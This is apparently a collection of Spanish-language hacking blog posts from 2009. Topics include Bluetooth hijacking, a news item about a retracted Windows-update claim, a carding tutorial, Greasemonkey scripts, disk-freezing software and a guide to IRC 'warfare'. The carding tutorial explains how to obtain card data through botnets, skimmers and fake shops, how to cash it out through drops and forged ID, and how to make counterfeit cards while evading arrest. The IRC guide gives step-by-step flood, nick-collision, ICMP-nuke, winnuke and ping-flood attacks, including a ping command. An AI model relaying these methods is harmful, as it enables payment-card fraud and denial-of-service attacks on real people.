Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades.

BlueBugging

Alguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente.

Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente.

Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack).

Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada.

Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono.

Las posibilidades y consecuencias de esto, estan a la Imaginación.

Bluetiming o Toothing

Podria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?.

Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia.

Fuente: BlueJacking Tools
Traducción y Adaptacion by :: Smartgenius ::

"Actualizaciones de Windows no ocasionan pantallas negras de la muerte"

2009-12-06T21:25:00.002+01:00

Una serie de medios informaron la víspera que millones de PC en todo el mundo podían verse afectados por "pantallas negras de la muerte" debido a errores de programación en recientes actualizaciones de Windows. La fuente del informe fue el blog de una desconocida empresa británica de seguridad informática, de nombre Prevx.

Prevx se refería en concreto a dos actualizaciones de Windows, KB976098, sobre zonas horarias, y KB915597 para Windows Defender, que según su blog modificaba el registro de Windows, resultando en la pantalla negra. La empresa incluso presentaba un procedimiento para solucionar el problema.

La empresa moderó posteriormente sus categóricas afirmaciones iniciales, diciendo que las condiciones que debían concurrir para generar la pantalla negra en Windows eran "espasmódicas" – quizás queriendo decir "esporádicas" y que es imposible reproducirlas de un PC a otro.

Luego, en una nueva actualización publicada el 2 de diciembre, Prevx se retracta totalmente.

En un comunicado, la empresa dice haber "cooperado con Microsoft", para detectar las causas exactas que generan la pantalla negra. Luego confirma que es una situación conocida desde hace varios años y que luego de pruebas exhaustivas se constata que las actualizaciones de Windows nada tienen que ver con el problema.

"Pedimos disculpas a Microsoft por cualquier inconveniente que pueda haber ocasionado nuestro blog".

Antes de la aclaración publicada por Prevx, Microsoft había publicado un comunicado donde dice haber investigado la información, y concluido que era "imprecisa".

"Hemos realizado una acuciosa investigación, constatando que ninguna de nuestras últimas actualizaciones tiene incidencia alguna con el fenómeno descrito en los informes. La empresa que difundió la información no nos había contactado. Hemos informado a la empresa sobre nuestras conclusiones", escribe Microsoft.

Llama la atención que Microsoft no se refiere a Prevx por su nombre, ni siquiera en el blog de seguridad de Technet.

Fuente

Tutorial carding

2009-12-05T10:42:00.001+01:00

La idea del carding consiste en manipulaciones bancarias con fin de obtener un beneficio que es pagado por alguien que no eres tu.

Para poder practicar el carding nesesitaremos cierto material(datos bancarios, dumps, cc`s etc).

Los datos normalmente se consigen por medios de :

BOTNETS

Una botnet es una red de ordenadores (de 5000++++) infectados por un programa que hace que el ordenador se conecte a

un servidor que controla todas las maquinas infectadas. De aqui se pueden sacar Cuentas, Tarjetas, Datos personales etc.

Las formas de hacerlo varian de la creatividad del carder. Pero lo mas usual es cambiar el host file de la victima

redireccionando los principales sitios de pagos a un scam

*scam : Clon de algun recurso que graba los datos los datos introducidos en los formularios o los envia

directamente a su dueno.

De aqui se pueden sacar datos como informacion de tarjetas y cuentas bancarias.

GRABBERS

Los grabbers son maquinas que se quedan con los datos de las bandas magneticas y las guardan a un archivo (DUMP).

Tambien se llaman grabbers los aparatos que se utilizan para grabar esos dumps en cintas magneticas. Para sacar dumps con

este tipo de aparatillos es de buena costumbre aprovechar lugares de trabajo. Lo unico que hay que hacer es pasar la tarjeta

por el lector.

HACKING E-SHOPS.

Aqui no hay nada que detallar ya que hay muchisimas tecnicas de hacerlo. Lo que hay que tener en cuenta al elegir

un e-shop victima es que ha de aceptar tarjetas de credito sin redireccion a la pasarela de pagos del banco de la tarjeta ya

que estos no guardan datos de la tarjeta en su base... Tiene que ser un sitio con formulario estandar para introducir la

tarjeta que bi se valida al instante.

FAKE SHOPS.

No tiene que ser Fake shop... la idea es crear una tienda virtual donde se pueda pagar con tarjetas de credito. De

ally hay dos salidas. La primera seria realmente hacer envios al comprador. Y la segunda es por alguna razon cancelar su

pedido. Mas si antes de cancelar el pedido del todo se pieden datos adicionales como fotocopia del SSN del pasaporte o de la

tarjeta mucho mejor!

COMPRAR MATERIAL

Si lo todo lo mencionado antes le parece demasiado dificil, hay una salida facil... pero hay que pagarla... Pueden

encontrar material de todo tipo en foros o canales especializados en carding (IRC). no voy a poner enlaces ya que no cuesta

nada buscar en google. Si tiene conocimientos de ingles o ruso... MUCHO MAS FACIL). Recomendaria negociar en foros ya que en

IRC hay mas probabilidades de engaño)...

Termino recordando que la creatividad de la estafa es infinita. lo unico que hay que hacer pensar unpoco en lo que te

has propuesto y de como consegirlo... y despues... hacerlo)

Hay varias formas del carding. Mas abajo intentare mencionar como funccionan las principales formas.

LAS PRINCIPALES EXPLOTACIONES

Una vez tenemos el material buscamos una manera de aprovecharlo...

Una vez que tengas:

TARJETAS DE CREDITO:

Lo mas comun que se puede hacer con una CC es comprar stuff por internet)...

los datos mas tipicos que se requieren para pagar con tarjeta son : Cardholdername(nombre del titular), Codigo de

seguridad (digitos de la parte trasera de la tarjeta), exp_date(fecha de expiracion) <-- casi siempre. y claro esta el numero

de la tarjeta.

Lo ideal para este tipo de compras son sitios que se toman la responsabilidad de retirar el dinero por ellos mismos

(ejemplo paypal) al recibir la respuesta 00 (tarjeta valida) y no mediante la pasarela de pagos del banco emisor de la

tarjeta. porque en este caso dependiendo del banco se suelen solicitar datos adicionales (como el pin de la tarjeta, el

numero de la seguridad social) o directamente mandan sms al numero del titular con un codigo de activacion de la

transferencia. Asique apuntad siempre los bin's (bank identification number. las primeras 6 cifras de la tarjeta) de sus

tarjetas que les fueron bien.

En pocas palabras, buscar algo que nos guste y pagarlo con la tarjeta. Ahora surgen las preguntas "Donde envio el stuff"?

Los carders profecionales suelen trabajar con personas de otros paises que les recojen los envios(drops), los venden y les

envian la mitad del dinero obtenido. Es mala costumbre cardear cosas con las que sabes que al final te quedas tu mismo... ya

que si te hacen una visita ya tienen pruebas para encerrarte de 3 a 6 años)....

Otros envian a conocidos de sus amigos con documentacion falsa... hay quien envia sus compras a casas abandonadas y las

esperan a la puerta de la casa... si es posible con documentacion falsa tb (un carnet en un idioma desconocido por el

"cartero" donde figure el nombre del receptor vale. asique media hora de photoshop y listo).

TRANSFERIR DINERO A CUENTA BANCARIA.

Esto ya es mas avanzado...

Para transferir dinero a una cuenta bancaria hay dos caminos.

1.) De una cuenta virtual.

2.) De una cuenta bancaria virtual.

El primer metodo es mas facil pero sacas mas si consiges una transferencia direta de una cuenta bancaria.

Es todo lo mismo que con compras por internet... pero aqui hay que complicarse montando un negocio virtual y poder

proporcionar simpre facturas por si las solicitan.

EL donde retirar el dinero? pues lo mismo que con compras de internet. la eleccion es suya.

un buen ejemplo de un banco virtual podria ser paypal o moneybookers, no voy a entrar en detalles de como trabajar con

estos bancos ya que es todo una teoria... Pero si investigan dentro de nada consegiran hacer sus primeras transferencias)...

El metodo dos consiste en consegir la password del panel de control virtual de una cuenta bancaria real y transferir el

dinero a sus drops (leer arriba: drops y el como consegir este tipo de cuentas.)

El problema esque los bancos suelen proporcionar al usuario una tarjeta con numeros junto a un codigo(tanes) que sirve

de verificacion para hacer una transferencia.

Algo tipo :

1 = 32
2 = 1b
3 = ff
4 = 1f....

y al intentar hacer una transferencia el banco le pide los valores de determinados numeros. Solucion : Inject de

tanes (modulo para bots que reenvia datos que introduce el titular de la cuenta) o buscar bancos sin este tipo de

protecciones.

Ahora va lo duro))))

REAL CARDING

El real carding consiste en fabricacion de tarjetas de credito. es el metodo mas beneficioso y el mas costoso a la vez...

ya que el equipo completo para fabricar tarjetas +o- parecidas a las reales puede llegar a costar hasta 10 mil euros. Pero

si lo montas viene lo bueno))

el equipo nesesario es:

Grabber:
Grabador de cintas magneticas. nesesitan uno que pueda grabar como minimo 2 pistas (tracks) ya que la mayoria de las

tarjetas visa y mc llevan 2 y rara vez 3 pistas. un aparatito asi cuesta de 500 euros hasta 6000.

Emboster:
Es el aparatito que les da el relieve a las tarjetas. (los numeritos del numero de la tarjeta y del nombre del titular). El

aparatito en realidad no es tan caro (nose el precio exacto porque el mio me lo hize yo))) es bastante facil de hacer. yo

utilize una plancha y unas plantillas de un mecano de niños

Card printer:

pequeña maquina que imprime en las tarjetas de plastico. (el precio no suele subir a mas de 1000ˆ, pero no vale ahorrar en

ese aparato ya que de el depende como van a quedar las tarjetas).

y lo ultimo es una maquinita que pega las cintas magneticas al plastico. este es opcional ya que por ally se venden

tarjetas prefabricadas (White card).

Bueno una vez tenemos todo esto consegimos un dump por ally fabricamos unas cuantas tarjetas, copramos un billete de

avion a algun pais donde nos gustaria hacer las compras y nos bamos.

Ahora simplemente simplemente pagamos con la tarjeta en caja como si fuera nuestra.

IMPORTANTE:
Es recomendable llevar siempre dinero efectivo cuando sales de compras (para no hacerte el sospechoso en caso de que algo

salga mal).

Es importante tambien que las targetas sean de credito i no de debito ya que las de debito siempre piden pin (es dificil

pillar un dump con pin ya que estos los usan directamente i no los venden)

En caso de que la tarjeta devuelva el codigo "tarjeta robada" y el vendedor intente quitar la tarjeta NUNCA DEJES QUE TE

QUITEN LA TARJETA. bajo cualquier excusa llevatelacontigo. SIEMPRE!

cuando hagas tus compras intenta ser natural i no te preocupes de nada.
recuerda que el pensamiento tiene una fuerza tremenda... no dejes que tus paranoyas te molesten a la hora de hacer

$$$ =)

Bueno pues nada... aqui acabo...Espero haber dato una buena base. Si tienen alguna o quieren que les explique algo

mas detalladamente un pm
No respondo a gente poco seria, ignorante y menor de edad.

Tutorial escrito por SPQR

Script

2009-12-02T12:02:00.004+01:00

En este post explicare que son y para que sirven.

El término Script puede referirse a:

* En informática, un script es un guión o conjunto de instrucciones. Permiten la automatización de tareas creando pequeñas utilidades. Es muy utilizado para la administración de sistemas UNIX. Son ejecutados por un intérprete de línea de órdenes y usualmente son archivos de texto. También un script puede considerarse una alteración o acción a una determinada plataforma.

fuente :wikipedia

Sabiendo esto como encuentro y utilizo los scripts.

Se necesita el mozilla firefox y en complementos añades el Grasemonkey esto te facilitara la entrada de nuevos scripts, los hay para hacerte todo mas facil y los hay para hackear.Para no estar buscandolos manualmente por la red, existe otro programa llamado Greasefire una vez que lo descarges el pequeño mono aparecerá en la barra de estado de FireFox; si hay scripts para el sitio, este mono se cambiará a color rojo, y al hacer clic en el ícono aparecerá la cantidad de scripts disponibles, y al hacer clic sobre esa cantidad se abrirá una ventana con más información de esos scripts. ¿Nada mal eh? mejor que estar buscando y buscando por la red.

Tambien puedes añadir tus scrpits creados busca en la google y encontraras muchos

Congela tu Disco Duro

2009-12-01T12:51:00.003+01:00

Los propietarios de Cybercafes y los usuarios con equipos compartidos están siempre buscando formas de mantener sus equipos funcionando en perfecto estado, esto desde luego porque no hay nada peor para la clientela de un Cafe Internet que encontrar equipos con virus, desconfigurados, que se traban constantemente o que hay que instalarles software que no tienen en dado momento.

La otra razón importante es el hecho de que son los mismos usuarios los que tienden a modificar configuraciones, grabar o eliminar archivos o bien almacenar información personal que no te sirve más que para ocupar espacio valioso en tus discos. Sin mencionar las amenazas provocadas por virus o programas que instalan y que hacen mas lentos tus equipos.

Así que hoy te compartimos una solución que seguramente te será de gran utilidad y es congelar tus discos duros. El proceso de congelamiento se refiere a la utilización de un programa que te permite guardar la configuración básica inicial de un equipo y restaurarla en cualquier momento (digamos todos los días por la noche o bien antes de abrir el negocio por la mañana).

La herramienta se llama DEEP FREEZE y es un programa que puedes descargar y probar en este link. El programa te permite grabar una configuración inicial y regresar a ella en el momento que lo desees.

Finalmente sólo recuerda que debes aclarar a tus clientes colocando algún cartel que diga algo como "No respondemos por la información que guardas en los equipos" o "Los equipos son limpiados y restaurados diariamente, guarda tu información en tu usb".

Tácticas de guerra en el IRC

2009-11-30T12:50:00.000+01:00

1.- Introducción.

La guerra en el IRC es, por desgracia, algo bastante común. Conviene, a lo menos, estar informado de las distintas técnicas que se suelen usar para "luchar", aunque sea simplemente para detectar que te están atacando y saber cómo lo están haciendo. No es mi intención profundizar demasiado en el tema aunque intentaré detallar algunos puntos que considere convenientes.

Todo lo que aquí se hable es extensible en general a cualquier red IRC. No obstante en algunos casos muy particulares me referiré a la red IRC hispana ("*.irc-hispano.org"). Ni que decir tiene que la información que se proporciona aquí es con fines educativos; en ningún caso debe ser usada salvo en circunstancias excepcionalmente justificadas. Un uso abusivo puede significar una k/g-line totalmente merecida. Yo no me hago responsable de un posible mal uso de esta info.

2.- Ataques.
En esta sección entraremos en materia... }:-) Nuestro objetivo: tirar a alguien del server irc.

2.1.- Flood.-

Los servidores IRC tienen que controlar el tráfico de entrada (el que proviene del exterior) para evitar su congestión. Una de las formas de conseguirlo es no permitir que un cliente le mande más de una determinada cantidad de información en un pequeño intervalo de tiempo; o lo que es lo mismo: la velocidad con que un cliente puede enviar datos al servidor está limitada.

Cuando un cliente supera el límite preestablecido por el servidor, éste cierra la conexión con el cliente: lo echa del servidor porque no puede soportar tanto caudal de entrada. El servidor lo "explica" así:

[1:59] *** _^TkLaS^_ has quit IRC (Excess Flood)

Un flood, en general, no es otra cosa que mandar mucha información en poco tiempo a alguien para intentar que se sature. Se puede floodear una dirección IP, ..., o lo que ahora nos concierne: un servidor de IRC.

La manera de aprovechar el flood en nuestro favor consiste en mandar muchas peticiones de información a nuestra víctima, de forma que ésta, al contestar, supere el límite del servidor y éste lo eche. Por ejemplo, si le mandamos muchos /ctcp version's seguidos (requiriendo información sobre el programa cliente que está utilizando) la víctima floodeará al servidor cuando conteste porque mandará muchas veces (tantas como peticiones haya habido) el texto de respuesta al servidor (para que del servidor vaya al cliente que peticionó, i.e., al atacante).

En esto del flood juega un papel muy importante el número de peticiones que se reciben en un pequeño intervalo de tiempo. Cuantas más se reciban, más posibilidades hay de que el flood tenga éxito. Por ello no es ninguna tontería mandar peticiones desde varios puntos a la vez, y no desde uno sólo, es decir, varios usuarios (¡que podrían ser una misma persona!) de la red IRC manden peticiones a la víctima todos a la vez en un determinado momento. Si los usuarios (nicks) corresponden a una misma persona (una misma dirección IP) se habla de clones. Por tanto, una posible forma de ataque sería crearnos muchos clones y peticionar a la vez desde todos ellos a la víctima.

Pero los servidores también suelen estar preparados para evitar muchos clones (cada clone ocupa, por decirlo de alguna manera, una "linea" de entrada al servidor, y esto consume recursos del mismo). Suele haber un máximo permitido (en el irc hispano es 2) denegándosele el acceso a la red a un tercer clone, o en caso de que éste lo consiguiese expulsándosele del servidor ("matándolo") (el programa servidor revisa periódicamente las IP's conectadas y detecta cuando hay varios usuarios con una misma dirección IP):

[1:32] *** _^Virus^_ has quit IRC (Killed (Clones!))

¿Cómo provocar un flood con más de 2 clones entonces? La respuesta es simple: en principio no se puede. ¿Entonces? Pues la solución es que varias personas distintas se pongan de acuerdo para atacar a la vez a la víctima. Cada persona podría tener a su vez varios clones. Por ejemplo, si A (atacante) quiere atacar a V (víctima), A se pone de acuerdo con B y C (otras 2 personas atacantes). A su vez supongamos que cada atacante tiene 2 clones: i.1 e i.2 (donde i=A,B,C). Entonces tendremos 6 usuarios (conexiones IRC) distintos atacando a V, que serían A.1, A.2, B.1, B.2, C.1 y C.2. Pero hay un problema: ¿cómo sincronizarse para atacar? ¿Cómo "ponerse de acuerdo" para mandar las peticiones en un determinado momento? Para esto existe lo que se denomina "floodnet" que, como habrá adivinado nuestro ávido lector, es una "red" (asociación) de gente cuyo único objetivo es floodear a alguien. La ventaja que tiene es que la sincronización entre los distintos componentes de la floodnet es automática (lo hacen los scripts) lo cual resuelve el problema anterior. También existe lo que se denomina "botnet" y que es análogo a la floodnet pero usando bots (no confundir con los "de servicio"; estos últimos los ponen los servers de la red irc y no los usuarios) los cuales serán lanzados desde alguna shell Unix (intérprete de comandos en una máquina Unix). Los bots suelen estar prohibidos y cuando se detectan, a lo menos, son expulsados:

[1:32] *** Viernes13 has quit IRC (Killed (You are not welcome to this network!))

Hoy en día tanto los programas clientes de IRC como los scripts implementan protecciones anti-flood que dificultan enormemente el éxito de un ataque de tipo flood. Por ejemplo, cuando detectan varias peticiones seguidas mandan las respuestas espaciadas en el tiempo (con pausas) y no inmediatamente, con lo cual se evita el flood.

También hay técnicas de flood bastante optimizadas (por ejemplo, usando una floodnet) aunque en general un ataque flood no suele ser demasiado eficiente y es más costoso lograr su éxito que con algunas de las técnicas que se describen a continuación.

2.2.- Nick collide.-

Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no debería ser posible (el servidor no deja usar un nick que ya está en uso) pero hay dos situaciones en las que podría darse el caso y que se describen en los dos puntos siguientes.

El resultado de un nick collide depende del servidor (ircd). En servidores antiguos (sin protección) el collide se resuelve matando a los dos usuarios con mismo nick (¡ambos!). En otros más inteligentes (con protección) el servidor guarda información acerca de los usuarios y puede saber que usuario tiene el nick con mayor antigüedad (i.e. quién se lo puso antes), matando únicamente al usuario con el nick más reciente (protegiendo al usuario más "veterano").

3.2.1.- Split server collide.-
Se basa en aprovechar un net-split:

- Esperar un split.
- Entrar (conectar) al servidor spliteado.
- Ponerse como nick el de la víctima.
- Esperar a que se deshaga el split.

Si todo va bien (el servidor no tiene protección), a la vuelta del split se detectará el collide y se matarán tanto al atacante como a la víctima. Lógicamente nuestro usuario atacante será un clone nuestro, con lo cual no pasa nada si es killeado.

3.2.2.- Lag collide.-
Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir los mensajes de otros servidores. Esta técnica es más efectiva que la anterior, pues funciona en servidores con protección.

Los pasos serían los siguientes:

- Meter un clone en el servidor lageado.
- Esperar a que la víctima cambie de nick (esto lo detectamos desde otro servidor no lageado).
- Cambiar rápidamente el nick de nuestro clone y ponerle el que se acaba de poner la víctima (el nuevo).
- Esperar al lag. ;)

Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al servidor (lageado) que la orden de cambio de nick de la víctima debido a que nuestra orden va directamente de nuestro cliente al servidor lageado mientras que la otra va a través de la red IRC (donde hemos supuesto que se introduce un lag notable). Esto hace que el servidor (lageado) tome a nuestro clone como "dueño" legítimo del nick y mande un kill al otro (la víctima). Esto ocurriría en caso de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado también aceptable, pues hemos acabado con nuestro objetivo.

2.3.- Nuke.-

"Nuke" es la denominación genérica que se le suele dar a cualquier forma de ataque consistente en mandar paquetes arbitrarios a una determinada dirección IP (no es que sea una definición demasiado ortodoxa pero bueno... :)). Realmente el término "nuke" siempre se ha referido al primero de los dos tipos que comentaremos, aunque aquí se ha preferido tomar una definición más amplia de dicha palabra.

2.2.1.- ICMP nuke.-

El más veterano de los nukes [ :-) ] usa un protocolo subyacente de IP, el ICMP ("Internet Control Message Protocol": parte integral del protocolo de Internet [IP] que resuelve errores y controla los mensajes), para romper una conexión cliente-servidor de IRC (tirar a alguien del server). Para entender cómo funciona hay que hablar un poco de protocolos; es aburrido pero no hay más remedio...

Una conexión IRC (cliente-servidor, que es lo que nos interesa) utiliza el protocolo TCP (nivel 4 [transporte] en la torre OSI), el cual se apoya sobre IP (nivel 3 [red]). IP se encarga, entre otras cosas, de hacer el rutado de paquetes ("datagramas IP"), es decir, dado un destino ir enviando los paquetes por el camino apropiado hasta alcanzar el host destino. TCP no ve nada de esto, tan sólo el destino directamente (manda los segmentos TCP directamente al destino), porque IP lo oculta (hace que el rutado sea transparente a TCP). Lógicamente para que un protocolo de nivel superior funcione correctamente, también deberán hacerlo todos los que estén por debajo. En particular, para que nuestra conexión TCP (IRC) se mantenga "viva", IP debe funcionar perfectamente. Y aquí es donde interviene ICMP: se encarga de informar de posibles anomalías que se han producido en el nivel 3 (IP), como por ejemplo, "host unreachable", que significaría que no se ha podido alcanzar el host (el paquete IP ha ido dando saltos ["hops"] de un nodo a otro, hacia el destino, y ha llegado un momento en el que un determinado nodo intermedio no sabía qué hacer con él o ha expirado el tiempo de vida de dicho paquete). En este caso, el paquete que informa del error (ICMP) lo envía el nodo intermedio que se ha dado cuenta del error hacia el "remitente" que lanzó el paquete original (que no se ha podido entregar a su destinatario). Los mensajes ICMP se situan dentro del campo de datos de un datagrama IP y se envían exactamente igual que si fueran datos IP (no son prioritarios). No es objetivo de este escrito tratar más a fondo este tema (para los interesados les aconsejo el libro "Internetworking with TCP/IP, vol I", de Douglas E. Comer, disponible en castellano ya en su tercera edición).

Resumiendo: mediante ICMP informamos de que IP ha fallado, y por tanto, también los niveles superiores como TCP.

Comprendiendo lo anterior ya se puede intuir en qué consiste el ICMP nuke: mandar mensajes ICMP falseados, engañando al destino, haciéndole creer que el otro extremo ha detectado un error y por tanto, provocando un "cierre" de la comunicación. Vamos a explicar un poco mejor ésto.

En una conexión siempre tenemos dos extremos, lo que da dos posibilidades a la hora de engañar, según lo hagamos a uno u otro. En el caso de una conexión IRC, podemos llevar a cabo dos formas de ataque:

* Server nuking (nukear al server): los mensajes ICMP se mandan al servidor IRC, haciéndole creer que se ha producido un error al intentar comunicarse con el cliente. Como respuesta a este mensaje el server cierra la conexión que tenía con dicho cliente. El efecto producido es la "expulsión" del usuario por parte del servidor.

* Client nuking (nukear al cliente): esta vez se envían los ICMP's al cliente; éste cree que el servidor no está disponible y cierra la conexión (el cliente). El servidor no sabe nada en principio, pero detecta el cierre de conexión por parte del cliente, dando el correspondiente error y cerrando también la conexión por su parte.

En teoría las dos fomas de nuking son perfectamente válidas y eficientes, aunque hay que tener ciertas consideraciones en cuenta, como son:

- tanto servidor como cliente pueden tener protección anti-nuke y puede ser necesario atacar uno porque el otro esté protegido (ver más adelante).
- si atacas a un cliente, éste puede detectar quién le está atacando con un simple analizador de paquetes IP o tracer, y también podría responder con otro ataque de este o cualquier otro tipo (cuidado con quién te metes ;-)).
- si atacas al servidor, el cliente no tiene manera de saber quién le ha "atacado" porque los mensajes ICMP no le han llegado a él sino al servidor (ventaja); pero por otro lado, el servidor sí sabe quién ha hecho el ataque y puede resultar en una K/G-Line a dicho usuario por parte del servidor (el usuario podría ser baneado de toda la red de IRC).
- los inconvenientes de los dos puntos anteriores pueden ser solventados falseando la dirección origen de los mensajes ICMP que se envían. Esta técnica se conoce como "spoofing" (ver punto 4).

Hay diversos tipos de error ICMP que se pueden utilizar a la hora de hacer un nuke. En cuanto a la información práctica de cómo utilizar un nuker (programa "nukeador"), debemos tener en cuenta que además de suministrarle el tipo de error que se desea producir, juegan un papel muy importante los puertos, tanto origen como destino, que se elijan.

Una conexión IRC (TCP) queda definida unívocamente por los pares dirección IP origen-puerto origen y dirección IP destino-puerto destino. Estos datos son los que hay que suministrarles al programa nukeador. Puertos típicos del servidor de IRC (será el puerto destino en caso de server nuking o el fuente si se trata de un client nuking) son 6665-9, 4400-6, 7000 y 7777. En realidad cada servidor IRC tiene unos puertos oficialmente reconocidos (que son conocidos públicamente: los podemos leer en el motd ["mensaje del dia"] al entrar en el IRC) y otros que podríamos denominar como privados, y que se usan por ejemplo para las conexiones entre los distintos servidores que forman la red. Un usuario puede estar usando uno de estos puertos "fantasmas" (aunque el servidor también puede limitar el acceso a estos puertos) para esconderse de nukes, puesto que necesitamos conocer este dato para que el nuke sea efectivo.

También necesitamos conocer el puerto del cliente, aunque esto es más difícil porque varía mucho (no son fijos como en el caso anterior) dependiendo del sistema operativo que esté corriendo dicho cliente, los puertos que ya tuviera ocupados antes de establecer la conexión IRC, étc. Lo normal es hacer un barrido de estos puertos empezando por el 1024 (hay puertos que por convenio siempre se asignan a determinadas tareas y no se pueden usar arbitrariamente con lo cual no necesitamos barrerlos) y acabando en 4000, por ejemplo, aunque podría ser necesario aumentar este número.

Es también muy útil utilizar un "port-scan": programa que va probando los distintos puertos de una dirección IP (destino) dada e informa de la respuesta recibida para cada uno de dichos puertos (así podemos saber, por ejemplo, qué puertos de un servidor están dedicados a aceptar conexiones IRC).

A continuación transcribo mensajes típicos de salida de nuestras potenciales víctimas en una sesión típica de IRC:

[1:42] *** aRmiTaGe has quit IRC (Read error to aRmiTaGe[ig-183.arrakis.es]: Connection reset by peer)
[1:13] *** KoNtRoL has quit IRC (Read error to KoNtRoL[195.76.99.76]: EOF from client)
[3:17] *** BrOKeNn has quit IRC (Read error to BrOKeNn[194.224.57.171]: Protocol not available)
[5:25] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Network is unreachable)
[5:26] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Machine is not on the network)
[4:20] *** vp has quit IRC (Read error to vp[ia-176.arrakis.es]: Connection refused)
[2:41] *** Estrayk has quit IRC (Read error to Estrayk[ctv3011.ctv.es]: No route to host)

La protección anti-nuke, a grosso modo, pasa por ignorar los mensajes ICMP que lleguen, aunque ésto ya está limitando el propio funcionamiento del protocolo IP, en el sentido de que ICMP es parte integrante de IP y no se debería inhibir (¿qué ocurriría si llega un mensaje "de verdad" y es ignorado?). Se puede llevar a cabo más o menos "finamente": por ejemplo descartar solo los ICMP's de un tipo y no todos los posibles. Se podría lograr con un firewall (software o hardware encargado de filtrar los paquetes provinientes de la red en base a una reglas previamente definidas) convenientemente configurado.

2.2.2.- OOB nuke.-

También conocido como 'winnuke', ya que afecta sólo al sistema operativo Windows, en cualquiera de sus "sabores": 3.x, 95 y NT. Se basa en un bug que tiene este SO en la pila de protocolos por el cual el sistema se cuelga ("error de protección general...blah, blah...") cuando recibe un paquete con el flag OOB ("Out of band") activado. El ataque es sencillo: mandar un paquete de este tipo a un puerto (normalmente el 139) de nuestrá víctima (ésta debe estar corriendo Windows, lo cual es muy normal hoy en día). Existen programas ya hechos a los cuales simplemente le das la dirección IP de la víctima y el programa lo hace todo.

La forma de protegerse es cerrar los puertos por los que nos puedan atacar (el 139 principalmente) o aplicar algún parche al SO para quitarnos el bug. Otra solución menos recomendable es la que llevan a cabo algunos ISPs (proveedores de Internet), y que consiste en filtrar todos los paquetes dirigidos al puerto 139 (inconveniente: nos están dejando inoperativo ese puerto). Hoy en día es muy popular este bug y normalmente está ampliamente parcheado (aunque siempre habrá algún que otro despistado que no lo tenga instalado }=)).

Como hemos dicho, este ataque no sólo consigue echar a la víctima del server sino que además le deja colgado el ordenador (tendrá que hacer un reboot), lo que lo hace especialmente peligroso. La víctima saldrá del IRC con un mensaje de tipo ping-timeout como:

[19:56] *** Goku has quit IRC (Ping timeout for Goku[system.tech.arrakis.es])

2.4.- Ping.-

Algunos los llama también "IP bombs" (bombas IP). Un ping es un tipo de mensaje ICMP que se usa para ver si una máquina se encuentra operativa y accesible. El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados). Además podemos obtener más datos como el grado de saturación de una máquina o red (midiendo el tiempo de respuesta de la máquina, es decir, el tiempo transcurrido desde que una máquina origen envía el ping hasta que recibe la contestación de la otra).

La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet. Por tanto se debe de hacer desde un enlace más potente que el que pretendemos atacar.

Lo típico es que la víctima esté en su casa y tenga un modem. Por tanto, necesitamos una conexión a inet más rápida que eso. Lo normal es atacar desde una máquina ubicada ya en la red (conectada mediante ATM, FDDI, ...). Por ejemplo, puede valer la cuenta de la Universidad ;-). La forma de hacerlo sería abriéndonos un shell y tecleando:

$ ping -s 32000

(la sintaxis puede variar ligeramente según sistema operativo).

Los paquetes que se envían al hacer ping son típicamente muy pequeños. Con el modificador -s estamos forzando un nuevo tamaño (32000 bytes es aceptable; también podeis probar con 64000).

Pensad: un modem de 28.8 tardará unos 18 segs. en recibir 64 Kbytes (sin considerar compresión), mientras que desde nuestra shell lo hemos mandado en ¡¡décimas de segundo!! Si consideramos además que el comando ping manda más de un paquete (los que queramos) ... ¡boom! Tendréis el modem de vuestra víctima trabajando a toda pastilla para nada y fastidiándole todo lo que esté haciendo. En particular, le estropearéis su conexión al IRC: en el mejor de los casos la víctima tendrá un lag horroroso y el peor será expulsada del servidor por "ping time-out".

2.5.- Ssping.-

Nos encontramos ante otro bug parecido al del OOB, que afecta a Win95 y NT (aunque no a todas las configuraciones), y cuya idea es que el "maravilloso" Windows "se lía" a la hora de reconstruir paquetes que le han llegado fragmentados y acaba con un cuelgue del ordenador. El ataque consiste en precisamente mandar esos paquetes fragmentados a la víctima.

Un bug de este tipo es viejo conocido de los sistemas UNIX (el ataque se conocía como "ping of death"); pero la novedad es que ahora lo sufren los Windows. Aunque son cosas técnicamente diferentes, la forma de proceder a la hora de atacar es análoga a OOB: solo hay que saber la dirección IP de la víctima y ¡boom!: le dejamos colgado el ordenador.

La solución pasa por parchear el S.O. En particular, este bug parece que no afecta al Trumpet Winsock así que si lo usais estareis protegidos.

3.- Spoofing.-

